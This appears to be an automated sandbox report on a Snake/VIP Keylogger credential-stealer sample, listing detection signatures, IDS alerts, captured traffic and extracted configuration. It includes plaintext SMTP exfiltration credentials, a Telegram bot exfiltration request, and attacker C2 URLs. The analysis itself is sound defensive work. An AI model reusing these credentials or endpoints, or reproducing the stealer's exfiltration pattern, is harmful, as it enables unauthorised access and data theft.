4.2.RegSvcs.exe.5400000.5.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3c240:$a1: get_encryptedPassword 0x3c214:$a2: get_encryptedUsername 0x3c2d8:$a3: get_timePasswordChanged 0x3c1f0:$a4: get_passwordField 0x3c256:$a5: set_encryptedPassword 0x3c023:$a7: get_logins 0x376a2:$a10: KeyLoggerEventArgs 0x37671:$a11: KeyLoggerEventArgsEventHandler 0x3c0f7:$a13: _encryptedPassword
4.2.RegSvcs.exe.5400000.5.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x473b4:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x46a57:$a3: \Google\Chrome\User Data\Default\Login Data 0x46cb4:$a4: \Orbitum\User Data\Default\Login Data 0x47693:$a5: \Kometa\User Data\Default\Login Data
4.2.RegSvcs.exe.5400000.5.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x39e16:$s1: UnHook 0x39db2:$s2: SetHook 0x39deb:$s3: CallNextHook 0x39d7a:$s4: _hook
4.2.RegSvcs.exe.2999a7e.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x4829c:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x4793f:$a3: \Google\Chrome\User Data\Default\Login Data 0x47b9c:$a4: \Orbitum\User Data\Default\Login Data 0x4857b:$a5: \Kometa\User Data\Default\Login Data
4.2.RegSvcs.exe.5400000.5.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
4.2.RegSvcs.exe.5400000.5.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
4.2.RegSvcs.exe.5400000.5.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
4.2.RegSvcs.exe.5200ee8.4.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
4.2.RegSvcs.exe.5200ee8.4.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
4.2.RegSvcs.exe.5200ee8.4.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
4.2.RegSvcs.exe.5200ee8.4.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
4.2.RegSvcs.exe.5200000.3.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x4a09c:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x4973f:$a3: \Google\Chrome\User Data\Default\Login Data 0x4999c:$a4: \Orbitum\User Data\Default\Login Data 0x4a37b:$a5: \Kometa\User Data\Default\Login Data
4.2.RegSvcs.exe.5200000.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
4.2.RegSvcs.exe.5200000.3.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
4.2.RegSvcs.exe.5200000.3.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
4.2.RegSvcs.exe.5200000.3.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
4.2.RegSvcs.exe.5200ee8.4.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3c240:$a1: get_encryptedPassword 0x3c214:$a2: get_encryptedUsername 0x3c2d8:$a3: get_timePasswordChanged 0x3c1f0:$a4: get_passwordField 0x3c256:$a5: set_encryptedPassword 0x3c023:$a7: get_logins 0x376a2:$a10: KeyLoggerEventArgs 0x37671:$a11: KeyLoggerEventArgsEventHandler 0x3c0f7:$a13: _encryptedPassword
4.2.RegSvcs.exe.5200ee8.4.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x473b4:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x46a57:$a3: \Google\Chrome\User Data\Default\Login Data 0x46cb4:$a4: \Orbitum\User Data\Default\Login Data 0x47693:$a5: \Kometa\User Data\Default\Login Data
4.2.RegSvcs.exe.5200ee8.4.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x39e16:$s1: UnHook 0x39db2:$s2: SetHook 0x39deb:$s3: CallNextHook 0x39d7a:$s4: _hook
4.2.RegSvcs.exe.299a966.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3bc16:$s1: UnHook 0x3bbb2:$s2: SetHook 0x3bbeb:$s3: CallNextHook 0x3bb7a:$s4: _hook
4.2.RegSvcs.exe.2999a7e.1.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3acfe:$s1: UnHook 0x3ac9a:$s2: SetHook 0x3acd3:$s3: CallNextHook 0x3ac62:$s4: _hook
4.2.RegSvcs.exe.5200000.3.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3d128:$a1: get_encryptedPassword 0x3d0fc:$a2: get_encryptedUsername 0x3d1c0:$a3: get_timePasswordChanged 0x3d0d8:$a4: get_passwordField 0x3d13e:$a5: set_encryptedPassword 0x3cf0b:$a7: get_logins 0x3858a:$a10: KeyLoggerEventArgs 0x38559:$a11: KeyLoggerEventArgsEventHandler 0x3cfdf:$a13: _encryptedPassword
4.2.RegSvcs.exe.5200000.3.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x4829c:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x4793f:$a3: \Google\Chrome\User Data\Default\Login Data 0x47b9c:$a4: \Orbitum\User Data\Default\Login Data 0x4857b:$a5: \Kometa\User Data\Default\Login Data
4.2.RegSvcs.exe.5400000.5.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3e040:$a1: get_encryptedPassword 0x3e014:$a2: get_encryptedUsername 0x3e0d8:$a3: get_timePasswordChanged 0x3dff0:$a4: get_passwordField 0x3e056:$a5: set_encryptedPassword 0x3de23:$a7: get_logins 0x394a2:$a10: KeyLoggerEventArgs 0x39471:$a11: KeyLoggerEventArgsEventHandler 0x3def7:$a13: _encryptedPassword
4.2.RegSvcs.exe.5200000.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3cafe:$s1: UnHook 0x3ca9a:$s2: SetHook 0x3cad3:$s3: CallNextHook 0x3ca62:$s4: _hook
4.2.RegSvcs.exe.5400000.5.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x491b4:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x48857:$a3: \Google\Chrome\User Data\Default\Login Data 0x48ab4:$a4: \Orbitum\User Data\Default\Login Data 0x49493:$a5: \Kometa\User Data\Default\Login Data
4.2.RegSvcs.exe.5200000.3.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3acfe:$s1: UnHook 0x3ac9a:$s2: SetHook 0x3acd3:$s3: CallNextHook 0x3ac62:$s4: _hook
4.2.RegSvcs.exe.5400000.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3bc16:$s1: UnHook 0x3bbb2:$s2: SetHook 0x3bbeb:$s3: CallNextHook 0x3bb7a:$s4: _hook
Click to see the 74 entries

Sigma Signatures

System Summary

Sigma detected: Suspicious Outbound SMTP Connections

Source: Network Connection

Author: frack113: Data: DestinationIp: 166.62.28.135, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Initiated: true, ProcessId: 1708, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49830

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T23:15:34.893400+0100	2803305	3	Unknown Traffic	192.168.2.5	49712	104.21.80.1	443	TCP
2025-01-10T23:15:36.941517+0100	2803305	3	Unknown Traffic	192.168.2.5	49724	104.21.80.1	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T23:15:33.467635+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49704	193.122.130.0	80	TCP
2025-01-10T23:15:34.326975+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49704	193.122.130.0	80	TCP
2025-01-10T23:15:36.359786+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49717	193.122.130.0	80	TCP
2025-01-10T23:15:37.483224+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49730	193.122.130.0	80	TCP

Joe Security ANOMALY Telegram Send Message

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T23:15:44.652830+0100	1810007	1	Potentially Bad Traffic	192.168.2.5	49792	149.154.167.220	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000004.00000002.4582299740.0000000002E81000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "operations@starofseasmarine.com", "Password": "Dontforget2015", "Host": "mail.starofseasmarine.com", "Port": "587", "Version": "4.4"}
Source: 4.2.RegSvcs.exe.5400000.5.unpack	Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "operations@starofseasmarine.com", "Password": "Dontforget2015", "Host": "mail.starofseasmarine.com", "Port": "587"}

Multi AV Scanner detection for submitted file

Source: C5JLkBS1CX.exe	ReversingLabs: Detection: 91%
Source: C5JLkBS1CX.exe	Virustotal: Detection: 66%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: C5JLkBS1CX.exe

Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: C5JLkBS1CX.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49706 version: TLS 1.0

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49792 version: TLS 1.2

Source:	Binary string: _.pdb source: RegSvcs.exe, 00000004.00000002.4584785930.0000000005200000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.4581535974.0000000002959000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: C5JLkBS1CX.exe, 00000000.00000003.2152021291.00000000037E0000.00000004.00001000.00020000.00000000.sdmp, C5JLkBS1CX.exe, 00000000.00000003.2152153124.0000000003980000.00000004.00001000.00020000.00000000.sdmp, C5JLkBS1CX.exe, 00000003.00000003.2183296498.00000000037E0000.00000004.00001000.00020000.00000000.sdmp, C5JLkBS1CX.exe, 00000003.00000003.2182170670.0000000003930000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: C5JLkBS1CX.exe, 00000000.00000003.2152021291.00000000037E0000.00000004.00001000.00020000.00000000.sdmp, C5JLkBS1CX.exe, 00000000.00000003.2152153124.0000000003980000.00000004.00001000.00020000.00000000.sdmp, C5JLkBS1CX.exe, 00000003.00000003.2183296498.00000000037E0000.00000004.00001000.00020000.00000000.sdmp, C5JLkBS1CX.exe, 00000003.00000003.2182170670.0000000003930000.00000004.00001000.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\C5JLkBS1CX.exe	Code function: 0_2_0064445A GetFileAttributesW,FindFirstFileW,FindClose,	0_2_0064445A
Source: C:\Users\user\Desktop\C5JLkBS1CX.exe	Code function: 0_2_0064C6D1 FindFirstFileW,FindClose,	0_2_0064C6D1
Source: C:\Users\user\Desktop\C5JLkBS1CX.exe	Code function: 0_2_0064C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_0064C75C
Source: C:\Users\user\Desktop\C5JLkBS1CX.exe	Code function: 0_2_0064EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0064EF95
Source: C:\Users\user\Desktop\C5JLkBS1CX.exe	Code function: 0_2_0064F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0064F0F2
Source: C:\Users\user\Desktop\C5JLkBS1CX.exe	Code function: 0_2_0064F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0064F3F3
Source: C:\Users\user\Desktop\C5JLkBS1CX.exe	Code function: 0_2_006437EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_006437EF
Source: C:\Users\user\Desktop\C5JLkBS1CX.exe	Code function: 0_2_00643B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00643B12
Source: C:\Users\user\Desktop\C5JLkBS1CX.exe	Code function: 0_2_0064BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0064BCBC

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	4_2_02B1DF78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06981D39h	4_2_06981A88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 069824ADh	4_2_06982090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 0698021Dh	4_2_06980040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06980BA7h	4_2_06980040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 0698D179h	4_2_0698CED0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 0698C8C9h	4_2_0698C620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 0698FCE9h	4_2_0698FA40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 0698CD21h	4_2_0698CA78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 0698DA29h	4_2_0698D780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 0698DE81h	4_2_0698DBD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 069824ADh	4_2_069823DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 0698D5D1h	4_2_0698D328
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 0698E731h	4_2_0698E488
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 069824ADh	4_2_06982081
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 0698EB89h	4_2_0698E8E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 0698E2D9h	4_2_0698E030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 0698F439h	4_2_0698F190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 0698C471h	4_2_0698C1C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 0698F891h	4_2_0698F5E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 0698EFE1h	4_2_0698ED38

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.5:49792 -> 149.154.167.220:443

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Yara detected Generic Downloader

Source: Yara match	File source: 4.2.RegSvcs.exe.5200ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.RegSvcs.exe.2999a7e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.RegSvcs.exe.5200000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.RegSvcs.exe.5400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.RegSvcs.exe.299a966.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.4585202613.0000000005400000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4584785930.0000000005200000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Source: global traffic

TCP traffic: 192.168.2.5:49830 -> 166.62.28.135:587

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:358075%0D%0ADate%20and%20Time:%2011/01/2025%20/%2005:10:41%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20358075%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 193.122.130.0 193.122.130.0

Source: Joe Sandbox View

ASN Name: AS-26496-GO-DADDY-COM-LLCUS AS-26496-GO-DADDY-COM-LLCUS

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49717 -> 193.122.130.0:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49704 -> 193.122.130.0:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49730 -> 193.122.130.0:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49712 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49724 -> 104.21.80.1:443

Source: global traffic

TCP traffic: 192.168.2.5:49830 -> 166.62.28.135:587

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown

HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49706 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\C5JLkBS1CX.exe

Code function: 0_2_006522EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

0_2_006522EE

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:358075%0D%0ADate%20and%20Time:%2011/01/2025%20/%2005:10:41%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20358075%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org
Source: global traffic	DNS traffic detected: DNS query: mail.starofseasmarine.com

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 10 Jan 2025 22:15:44 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: RegSvcs.exe, 00000004.00000002.4582299740.0000000002FBB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: RegSvcs.exe, 00000004.00000002.4585202613.0000000005400000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.4584785930.0000000005200000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.4581535974.0000000002959000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: RegSvcs.exe, 00000004.00000002.4582299740.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.4585202613.0000000005400000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.4584785930.0000000005200000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.4581535974.0000000002959000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: RegSvcs.exe, 00000004.00000002.4582299740.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.4585202613.0000000005400000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.4584785930.0000000005200000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.4581535974.0000000002959000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
